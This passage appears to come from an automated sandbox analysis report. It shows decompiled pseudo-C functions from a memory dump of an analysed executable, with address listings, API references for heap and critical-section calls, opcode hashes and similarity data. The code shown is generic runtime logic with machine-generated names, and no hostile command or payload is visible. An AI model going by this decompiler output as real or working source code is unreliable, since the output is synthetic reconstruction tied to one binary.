										_t175 = _t106;
									}
									 *((intOrPtr*)(_t176 - 0x34)) = 0x41b818;
									E00403A9C( *((intOrPtr*)(_t176 - 0x2c)));
									_t103 = _t175;
								}
							} else {
								if(__eflags < 0) {
									goto L11;
								} else {
									__eflags =  *((intOrPtr*)(_t176 - 0x18)) - _t145;
									if( *((intOrPtr*)(_t176 - 0x18)) >= _t145) {
										goto L12;
									} else {
										goto L11;
									}
								}
							}
						}
					}
				} else {
					_t103 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t176 - 0xc));
				return _t103;
			}




















                              0x0040f64d
                              0x0040f658
                              0x0040f65b
                              0x0040f65f
                              0x0040f667
                              0x0040f670
                              0x0040f679
                              0x0040f67f
                              0x0040f681
                              0x0040f687
                              0x0040f68d
                              0x0040f68f
                              0x0040f68f
                              0x0040f697
                              0x0040f69a
                              0x0040f69d
                              0x0040f6a4
                              0x0040f6aa
                              0x0040f6b0
                              0x0040f6b6
                              0x0040f6b7
                              0x0040f6c2
                              0x0040f6c4
                              0x0040f6c4
                              0x0040f6d4
                              0x0040f6d5
                              0x0040f6de
                              0x0040f6e2
                              0x0040f6e8
                              0x0040f6f1
                              0x0040f6f3
                              0x0040f707
                              0x0040f709
                              0x0040f6f5
                              0x0040f6f5
                              0x0040f6f9
                              0x00000000
                              0x0040f6fb
                              0x0040f6fb
                              0x0040f6fe
                              0x0040f70f
                              0x0040f70f
                              0x0040f71d
                              0x0040f722
                              0x0040f724
                              0x0040f72a
                              0x0040f72d
                              0x0040f730
                              0x0040f73a
                              0x0040f740
                              0x0040f74d
                              0x0040f752
                              0x0040f754
                              0x0040f75d
                              0x0040f767
                              0x0040f76a
                              0x0040f76f
                              0x0040f775
                              0x0040f778
                              0x0040f77e
                              0x0040f784
                              0x0040f787
                              0x0040f78d
                              0x0040f792
                              0x0040f795
                              0x0040f797
                              0x0040f797
                              0x0040f79c
                              0x0040f7a8
                              0x0040f7ac
                              0x0040f7b6
                              0x0040f7c0
                              0x0040f7c3
                              0x0040f7c6
                              0x0040f7ca
                              0x0040f7cf
                              0x0040f7d2
                              0x0040f7dc
                              0x0040f7dc
                              0x0040f7df
                              0x0040f7e5
                              0x0040f7e5
                              0x0040f7e1
                              0x0040f7e1
                              0x0040f7e3
                              0x00000000
                              0x00000000
                              0x0040f7e3
                              0x0040f7ed
                              0x0040f803
                              0x0040f808
                              0x0040f80a
                              0x0040f815
                              0x0040f819
                              0x0040f826
                              0x0040f82a
                              0x0040f82c
                              0x0040f82c
                              0x0040f834
                              0x0040f842
                              0x0040f847
                              0x0040f84a
                              0x0040f84f
                              0x0040f852
                              0x0040f858
                              0x0040f858
                              0x0040f854
                              0x0040f854
                              0x0040f856
                              0x00000000
                              0x00000000
                              0x0040f856
                              0x00000000
                              0x0040f81b
                              0x0040f81b
                              0x0040f81e
                              0x0040f822
                              0x0040f822
                              0x0040f80c
                              0x0040f80c
                              0x0040f80f
                              0x00000000
                              0x0040f80f
                              0x0040f7d4
                              0x0040f7d4
                              0x0040f7d6
                              0x0040f85d
                              0x0040f861
                              0x0040f86c
                              0x0040f872
                              0x0040f877
                              0x0040f87a
                              0x0040f87e
                              0x0040f87e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040f7d6
                              0x0040f883
                              0x0040f88b
                              0x0040f88f
                              0x0040f894
                              0x0040f894
                              0x0040f894
                              0x0040f89b
                              0x0040f756
                              0x0040f756
                              0x0040f756
                              0x0040f8a3
                              0x0040f8aa
                              0x0040f8b0
                              0x0040f8b0
                              0x0040f700
                              0x0040f700
                              0x00000000
                              0x0040f702
                              0x0040f702
                              0x0040f705
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040f705
                              0x0040f700
                              0x0040f6fe
                              0x0040f6f9
                              0x0040f6ea
                              0x0040f6ea
                              0x0040f6ea
                              0x0040f8b8
                              0x0040f8c0

                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 56d9e38b1f38824fae3835b0a2d2d95e6ef7d2a708d669e2796a4f5ecf1bfba5
                              • Instruction ID: 8e2da863e0ec0aed1c7df7ef9f788bacddda9dad52c8f94b50dff24b72cd6dff
                              • Opcode Fuzzy Hash: 56d9e38b1f38824fae3835b0a2d2d95e6ef7d2a708d669e2796a4f5ecf1bfba5
                              • Instruction Fuzzy Hash: A7814A71E006059BCB24EBA9C481ADEFBB0BF48304F14453EE445B3791DB38A949CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040C783 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040C783(void* __ecx) {
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr _t64;
				intOrPtr* _t66;
				intOrPtr _t68;
				intOrPtr* _t69;
				intOrPtr _t70;
				intOrPtr* _t72;
				intOrPtr _t83;
				signed int _t97;
				void* _t100;
				intOrPtr* _t101;
				intOrPtr _t102;
				void* _t104;

				E00413954(E0041A330, _t104);
				_t100 = __ecx;
				_t59 =  *((intOrPtr*)(__ecx + 0x28));
				if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x18)) + 0xc)) + _t59)) == 0) {
					 *(_t104 - 0x10) = 2;
				} else {
					 *(_t104 - 0x10) = 0 |  *((intOrPtr*)(__ecx + 0x2c)) != 0x00000000;
				}
				 *((intOrPtr*)(_t104 - 0x14)) = 0;
				_t97 =  *((intOrPtr*)(_t100 + 0x24)) + _t59;
				_t60 =  *((intOrPtr*)(_t100 + 0x1c));
				 *(_t104 - 4) = 0;
				_t61 =  *((intOrPtr*)( *_t60 + 0x14))(_t60,  *((intOrPtr*)(_t100 + 0x20)) + _t97, _t104 - 0x14,  *(_t104 - 0x10));
				 *((intOrPtr*)(_t104 - 0x18)) = _t61;
				if(_t61 == 0) {
					E0040640D( *((intOrPtr*)(_t100 + 0xc)) + 8,  *((intOrPtr*)(_t104 - 0x14)));
					_t64 =  *((intOrPtr*)(_t100 + 0xc));
					 *(_t64 + 0x18) =  *(_t64 + 0x18) | 0xffffffff;
					 *((intOrPtr*)(_t64 + 0x10)) = 0;
					 *((intOrPtr*)(_t64 + 0x14)) = 0;
					 *((char*)(_t64 + 0x1c)) =  *((intOrPtr*)(_t100 + 0x2d));
					_t83 =  *((intOrPtr*)(_t100 + 0x14));
					 *((char*)(_t100 + 0x2e)) = 1;
					_t66 =  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x70)) + _t97 * 4));
					 *((intOrPtr*)(_t100 + 0x30)) =  *_t66;
					 *((intOrPtr*)(_t100 + 0x34)) =  *((intOrPtr*)(_t66 + 4));
					if( *(_t104 - 0x10) == 0 &&  *((intOrPtr*)(_t104 - 0x14)) == 0 && (_t97 >=  *((intOrPtr*)(_t83 + 0x120)) ||  *((intOrPtr*)( *((intOrPtr*)(_t83 + 0x124)) + _t97)) == 0) &&  *((intOrPtr*)(_t66 + 0x1d)) == 0) {
						 *(_t104 - 0x10) = 2;
					}
					_t101 =  *((intOrPtr*)(_t100 + 0x1c));
					_t68 =  *((intOrPtr*)( *_t101 + 0x18))(_t101,  *(_t104 - 0x10));
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					_t102 = _t68;
					_t69 =  *((intOrPtr*)(_t104 - 0x14));
					if(_t69 != 0) {
						 *((intOrPtr*)( *_t69 + 8))(_t69);
					}
					_t70 = _t102;
				} else {
					_t72 =  *((intOrPtr*)(_t104 - 0x14));
					 *(_t104 - 4) =  *(_t104 - 4) | 0xffffffff;
					if(_t72 != 0) {
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t70 =  *((intOrPtr*)(_t104 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t104 - 0xc));
				return _t70;
			}


















                              0x0040c788
                              0x0040c792
                              0x0040c79a
                              0x0040c7a3
                              0x0040c7b2
                              0x0040c7a5
                              0x0040c7ad
                              0x0040c7ad
                              0x0040c7b9
                              0x0040c7c5
                              0x0040c7c7
                              0x0040c7ce
                              0x0040c7d7
                              0x0040c7dc
                              0x0040c7df
                              0x0040c803
                              0x0040c808
                              0x0040c80e
                              0x0040c812
                              0x0040c815
                              0x0040c818
                              0x0040c81b
                              0x0040c81e
                              0x0040c828
                              0x0040c82d
                              0x0040c833
                              0x0040c836
                              0x0040c855
                              0x0040c855
                              0x0040c85c
                              0x0040c865
                              0x0040c868
                              0x0040c86c
                              0x0040c86e
                              0x0040c873
                              0x0040c878
                              0x0040c878
                              0x0040c87b
                              0x0040c7e1
                              0x0040c7e1
                              0x0040c7e4
                              0x0040c7ea
                              0x0040c7ef
                              0x0040c7ef
                              0x0040c7f2
                              0x0040c7f2
                              0x0040c883
                              0x0040c88b

                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
                              • Instruction ID: af1ffdf326ee6b9e8f9f4efb185a7a75328b0af80e7613720a9e9424578e33b6
                              • Opcode Fuzzy Hash: f15c909000a7bc487a9015a8e9d061d5051666e8d9c8f725cb2d7f58cfb25987
                              • Instruction Fuzzy Hash: A9416D71A00646CFCB24DF58C48496ABBF1FF48314B2486AED096AB392C371ED46CF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040D1AB Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                              Download Yara Rule
                              C-Code - Quality: 95%
                              			E0040D1AB() {
				intOrPtr* _t44;
				intOrPtr _t50;
				void* _t61;
				intOrPtr* _t62;
				void* _t75;
				intOrPtr _t76;
				void* _t79;
				intOrPtr* _t80;
				void* _t82;
				void* _t84;

				E00413954(E0041A550, _t82);
				 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
				_t62 =  *((intOrPtr*)(_t82 + 8));
				 *((intOrPtr*)(_t82 - 0x10)) = _t84 - 0x58;
				 *((intOrPtr*)( *_t62 + 0x10))(_t62, _t75, _t79, _t61);
				_t80 =  *((intOrPtr*)(_t82 + 0x14));
				 *(_t82 - 4) = 1;
				_t87 = _t80;
				 *((intOrPtr*)(_t82 - 0x14)) = _t80;
				if(_t80 != 0) {
					 *((intOrPtr*)( *_t80 + 4))(_t80);
				}
				 *(_t82 - 0x64) =  *(_t82 - 0x64) & 0x00000000;
				 *(_t82 - 4) = 3;
				E00402155(_t82 - 0x60);
				 *((intOrPtr*)(_t82 - 0x60)) = 0x41b808;
				_push( *((intOrPtr*)(_t82 + 0x10)));
				 *(_t82 - 4) = 4;
				_t76 = E0040DF69(_t82 - 0x64, _t82, _t87,  *((intOrPtr*)(_t82 + 0xc)));
				_t88 = _t76;
				if(_t76 == 0) {
					_t77 = _t62 + 0x10;
					_push(_t62 + 0x10); // executed
					_t44 = E0040F8C3(_t82 - 0x64, __eflags); // executed
					__eflags = _t44;
					 *((intOrPtr*)(_t82 + 0x14)) = _t44;
					if(__eflags == 0) {
						E0040F4D8(_t77);
						E0040F51A();
						E0040F56F(_t77);
						E0040640D(_t62 + 8,  *((intOrPtr*)(_t82 + 0xc)));
						 *(_t82 - 4) = 2;
						E0040D2CF(_t82 - 0x64, __eflags);
						__eflags = _t80;
						 *(_t82 - 4) = 1;
						if(_t80 != 0) {
							 *((intOrPtr*)( *_t80 + 8))(_t80);
						}
						_t50 = 0;
					} else {
						 *(_t82 - 4) = 2;
						E0040D2CF(_t82 - 0x64, __eflags);
						__eflags = _t80;
						 *(_t82 - 4) = 1;
						if(_t80 != 0) {
							 *((intOrPtr*)( *_t80 + 8))(_t80);
						}
						_t50 =  *((intOrPtr*)(_t82 + 0x14));
					}
				} else {
					 *(_t82 - 4) = 2;
					E0040D2CF(_t82 - 0x64, _t88);
					 *(_t82 - 4) = 1;
					if(_t80 != 0) {
						 *((intOrPtr*)( *_t80 + 8))(_t80);
					}
					_t50 = _t76;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0xc));
				return _t50;
			}













                              0x0040d1b0
                              0x0040d1b8
                              0x0040d1bd
                              0x0040d1c4
                              0x0040d1c8
                              0x0040d1cb
                              0x0040d1ce
                              0x0040d1d2
                              0x0040d1d4
                              0x0040d1d7
                              0x0040d1dc
                              0x0040d1dc
                              0x0040d1df
                              0x0040d1e6
                              0x0040d1ea
                              0x0040d1ef
                              0x0040d1f6
                              0x0040d1fc
                              0x0040d208
                              0x0040d20a
                              0x0040d20c
                              0x0040d22f
                              0x0040d235
                              0x0040d236
                              0x0040d23b
                              0x0040d23d
                              0x0040d240
                              0x0040d263
                              0x0040d26a
                              0x0040d271
                              0x0040d27c
                              0x0040d284
                              0x0040d288
                              0x0040d28d
                              0x0040d28f
                              0x0040d293
                              0x0040d298
                              0x0040d298
                              0x0040d29b
                              0x0040d242
                              0x0040d245
                              0x0040d249
                              0x0040d24e
                              0x0040d250
                              0x0040d254
                              0x0040d259
                              0x0040d259
                              0x0040d25c
                              0x0040d25c
                              0x0040d20e
                              0x0040d211
                              0x0040d215
                              0x0040d21c
                              0x0040d220
                              0x0040d225
                              0x0040d225
                              0x0040d228
                              0x0040d228
                              0x0040d2c3
                              0x0040d2cc

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040D1B0
                                • Part of subcall function 0040F8C3: __EH_prolog.LIBCMT ref: 0040F8C8
                                • Part of subcall function 0040D2CF: __EH_prolog.LIBCMT ref: 0040D2D4
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
                              • Instruction ID: 9d10d91046bd1a4dd32f0e664b06ea8990f5f8cc09720d5c411fd584516079ca
                              • Opcode Fuzzy Hash: 580a599ea2fd8de7821de45faa8408fd12c279d3f34bd44459390ae0071a66e9
                              • Instruction Fuzzy Hash: 83313031901254DBCB11EFA4C6487EDBBB5AF15304F1440AEE8057B382DB78DE49DBA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00404C4A Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                              Download Yara Rule
                              C-Code - Quality: 93%
                              			E00404C4A(intOrPtr* __ecx, void* __eflags) {
				void* _t33;
				intOrPtr _t43;
				void* _t47;
				intOrPtr _t53;
				intOrPtr* _t82;
				void* _t84;
				void* _t86;
				intOrPtr _t87;

				E00413954(E004195D4, _t84);
				_t87 = _t86 - 0x64;
				_t82 = __ecx;
				E00404D51(_t84 - 0x70);
				_t53 = 0;
				_push(0x5c);
				 *((intOrPtr*)(_t84 - 4)) = 0;
				E00405468(_t84 - 0x1c, __ecx);
				_push(0x2a);
				 *((char*)(_t84 - 4)) = 1;
				_t33 = E00405468(_t84 - 0x28, _t84 - 0x1c);
				 *(_t84 - 0x38) =  *(_t84 - 0x38) | 0xffffffff;
				 *((char*)(_t84 - 4)) = 3;
				E00403D24(_t84 - 0x34, _t33);
				 *((char*)(_t84 - 4)) = 5;
				E00403A9C( *((intOrPtr*)(_t84 - 0x28)));
				while(E00405949(_t84 - 0x38, _t84 - 0x70) != 0) {
					_t87 = _t87 - 0xc;
					 *((intOrPtr*)(_t84 - 0x10)) = _t87;
					E00403D24(_t87, _t84 - 0x1c);
					_t47 = E00404D6C(_t84 - 0x70); // executed
					if(_t47 != _t53) {
						continue;
					} else {
						 *((char*)(_t84 - 4)) = 1;
						E00403A9C( *((intOrPtr*)(_t84 - 0x34)));
						E0040551A(_t84 - 0x38);
						E00403A9C( *((intOrPtr*)(_t84 - 0x1c)));
						E00403A9C( *((intOrPtr*)(_t84 - 0x48)));
						_t43 = 0;
					}
					L7:
					 *[fs:0x0] =  *((intOrPtr*)(_t84 - 0xc));
					return _t43;
				}
				 *((char*)(_t84 - 4)) = 1;
				E00403A9C( *((intOrPtr*)(_t84 - 0x34)));
				E0040551A(_t84 - 0x38);
				if(E0040489C( *_t82, 0) != 0) {
					_t53 = E004048AA( *_t82);
				}
				E00403A9C( *((intOrPtr*)(_t84 - 0x1c)));
				E00403A9C( *((intOrPtr*)(_t84 - 0x48)));
				_t43 = _t53;
				goto L7;
			}











                              0x00404c4f
                              0x00404c54
                              0x00404c59
                              0x00404c5f
                              0x00404c64
                              0x00404c66
                              0x00404c6d
                              0x00404c70
                              0x00404c75
                              0x00404c7d
                              0x00404c81
                              0x00404c86
                              0x00404c8e
                              0x00404c92
                              0x00404c9a
                              0x00404c9e
                              0x00404ca4
                              0x00404cb4
                              0x00404cbc
                              0x00404cc3
                              0x00404cca
                              0x00404cd1
                              0x00000000
                              0x00404cd3
                              0x00404cd6
                              0x00404cda
                              0x00404ce3
                              0x00404ceb
                              0x00404cf3
                              0x00404cf9
                              0x00404cfb
                              0x00404d3d
                              0x00404d42
                              0x00404d4b
                              0x00404d4b
                              0x00404d01
                              0x00404d05
                              0x00404d0e
                              0x00404d1e
                              0x00404d27
                              0x00404d27
                              0x00404d2c
                              0x00404d34
                              0x00404d3a
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 00404C4F
                                • Part of subcall function 00405468: __EH_prolog.LIBCMT ref: 0040546D
                                • Part of subcall function 00404D6C: __EH_prolog.LIBCMT ref: 00404D71
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 2d58e100b0e8a5684ba942a8d61a2b33c9f58aa7325c5ec0ae0d3fb5809bcd36
                              • Instruction ID: 9114e62b92f145f299bca9ec68259fa3d4e050d8b6bab90f4208dc7235d8fbe8
                              • Opcode Fuzzy Hash: 2d58e100b0e8a5684ba942a8d61a2b33c9f58aa7325c5ec0ae0d3fb5809bcd36
                              • Instruction Fuzzy Hash: 1A31AF71901209AADF05FFE1E842AEEBF75AF50318F10402FE441332D2CE795A4ADE59
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00413EA3 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 24%
                              			E00413EA3(unsigned int _a4) {
				signed int _v8;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t19;
				void* _t20;
				signed char _t22;
				void* _t23;
				void* _t24;
				void* _t36;
				unsigned int _t44;
				unsigned int _t46;
				intOrPtr _t47;
				void* _t50;

				_push(0xffffffff);
				_push(0x41b988);
				_push(E00414A2C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t19 =  *0x425a38; // 0x1
				if(_t19 != 3) {
					__eflags = _t19 - 2;
					if(_t19 != 2) {
						goto L11;
					} else {
						_t24 = _a4;
						__eflags = _t24;
						if(_t24 == 0) {
							_t44 = 0x10;
						} else {
							_t9 = _t24 + 0xf; // 0xf
							_t44 = _t9 & 0xfffffff0;
						}
						_a4 = _t44;
						__eflags = _t44 -  *0x42283c; // 0x1e0
						if(__eflags > 0) {
							L10:
							_push(_t44);
							goto L14;
						} else {
							E0041570A(9);
							_pop(_t36);
							_v8 = 1;
							_v32 = E00416894(_t36, _t44 >> 4);
							_v8 = _v8 | 0xffffffff;
							E00413F69();
							_t23 = _v32;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L10;
							}
						}
					}
				} else {
					_t46 = _a4;
					_t50 = _t46 -  *0x425a30; // 0x0
					if(_t50 > 0) {
						L11:
						_t20 = _a4;
						__eflags = _t20;
						if(_t20 == 0) {
							_t20 = 1;
						}
						_t22 = _t20 + 0x0000000f & 0x000000f0;
						__eflags = _t22;
						_push(_t22);
						L14:
						_push(0);
						_t23 = RtlAllocateHeap( *0x425a34); // executed
					} else {
						E0041570A(9);
						_v8 = _v8 & 0x00000000;
						_push(_t46);
						_v32 = E00415DF1();
						_v8 = _v8 | 0xffffffff;
						E00413F0A();
						_t23 = _v32;
						if(_t23 == 0) {
							goto L11;
						} else {
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t23;
			}
















                              0x00413ea6
                              0x00413ea8
                              0x00413ead
                              0x00413eb8
                              0x00413eb9
                              0x00413ec6
                              0x00413ece
                              0x00413f13
                              0x00413f16
                              0x00000000
                              0x00413f18
                              0x00413f18
                              0x00413f1b
                              0x00413f1d
                              0x00413f29
                              0x00413f1f
                              0x00413f1f
                              0x00413f22
                              0x00413f22
                              0x00413f2a
                              0x00413f2d
                              0x00413f33
                              0x00413f63
                              0x00413f63
                              0x00000000
                              0x00413f35
                              0x00413f37
                              0x00413f3c
                              0x00413f3d
                              0x00413f50
                              0x00413f53
                              0x00413f57
                              0x00413f5c
                              0x00413f5f
                              0x00413f61
                              0x00000000
                              0x00000000
                              0x00413f61
                              0x00413f33
                              0x00413ed0
                              0x00413ed0
                              0x00413ed3
                              0x00413ed9
                              0x00413f72
                              0x00413f72
                              0x00413f75
                              0x00413f77
                              0x00413f7b
                              0x00413f7b
                              0x00413f7f
                              0x00413f7f
                              0x00413f81
                              0x00413f82
                              0x00413f82
                              0x00413f8a
                              0x00413edf
                              0x00413ee1
                              0x00413ee7
                              0x00413eeb
                              0x00413ef2
                              0x00413ef5
                              0x00413ef9
                              0x00413efe
                              0x00413f03
                              0x00000000
                              0x00000000
                              0x00413f05
                              0x00413f03
                              0x00413ed9
                              0x00413f93
                              0x00413f9e

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 00413F8A
                                • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$AllocateEnterHeapInitialize
                              • String ID:
                              • API String ID: 1616793339-0
                              • Opcode ID: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
                              • Instruction ID: 7c2cfac85a053aeac9454e1c2b35b253285297f11283e44f43d764ba5cf7311f
                              • Opcode Fuzzy Hash: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
                              • Instruction Fuzzy Hash: 1A217431E44605EBDB10AFA9DC42BDAB7B4EB01765F10421BF411EB2D0C778AAC28A58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00413F9F Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMONLIBRARYCODE
                              Download Yara Rule
                              C-Code - Quality: 30%
                              			E00413F9F(intOrPtr _a4) {
				signed int _v8;
				char _v20;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _t19;
				intOrPtr _t20;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr _t40;
				char _t42;
				intOrPtr _t49;

				_push(0xffffffff);
				_push(0x41b9a0);
				_push(E00414A2C);
				_t19 =  *[fs:0x0];
				_push(_t19);
				 *[fs:0x0] = _t42;
				_t40 = _a4;
				if(_t40 != 0) {
					_t20 =  *0x425a38; // 0x1
					if(_t20 != 3) {
						if(_t20 != 2) {
							_push(_t40);
							goto L12;
						} else {
							E0041570A(9);
							_v8 = 1;
							_t24 = E004167F8(_t40,  &_v44,  &_v36);
							_v40 = _t24;
							if(_t24 != 0) {
								E0041684F(_v44, _v36, _t24);
							}
							_v8 = _v8 | 0xffffffff;
							_t19 = E00414061();
							goto L9;
						}
					} else {
						E0041570A(9);
						_v8 = _v8 & 0x00000000;
						_t27 = E00415A9D(_t40);
						_v32 = _t27;
						if(_t27 != 0) {
							_push(_t40);
							_push(_t27);
							E00415AC8();
						}
						_v8 = _v8 | 0xffffffff;
						_t19 = E00414009();
						_t49 = _v32;
						L9:
						if(_t49 == 0) {
							_push(_a4);
							L12:
							_push(0);
							_t19 = RtlFreeHeap( *0x425a34); // executed
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t19;
			}
















                              0x00413fa2
                              0x00413fa4
                              0x00413fa9
                              0x00413fae
                              0x00413fb4
                              0x00413fb5
                              0x00413fc2
                              0x00413fc7
                              0x00413fcd
                              0x00413fd5
                              0x00414015
                              0x0041406a
                              0x00000000
                              0x00414017
                              0x00414019
                              0x0041401f
                              0x0041402f
                              0x00414037
                              0x0041403c
                              0x00414045
                              0x0041404a
                              0x0041404d
                              0x00414051
                              0x00000000
                              0x00414056
                              0x00413fd7
                              0x00413fd9
                              0x00413fdf
                              0x00413fe4
                              0x00413fea
                              0x00413fef
                              0x00413ff1
                              0x00413ff2
                              0x00413ff3
                              0x00413ff9
                              0x00413ffa
                              0x00413ffe
                              0x00414003
                              0x0041405a
                              0x0041405a
                              0x0041405c
                              0x0041406b
                              0x0041406b
                              0x00414073
                              0x00414073
                              0x0041405a
                              0x00413fd5
                              0x0041407c
                              0x00414087

                              APIs
                              • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,00000000,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074), ref: 00414073
                                • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
